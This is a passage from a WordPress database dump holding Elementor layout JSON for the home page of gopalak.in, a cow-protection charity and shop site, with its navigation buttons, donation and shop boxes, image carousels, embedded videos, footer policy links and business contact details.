":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11813,1960,'_elementor_page_assets','a:0:{}'),(11815,1961,'_elementor_edit_mode','builder'),(11816,1961,'_elementor_template_type','wp-page'),(11817,1961,'_elementor_version','3.7.8'),(11818,1961,'_wp_page_template','elementor_canvas'),(11819,1961,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 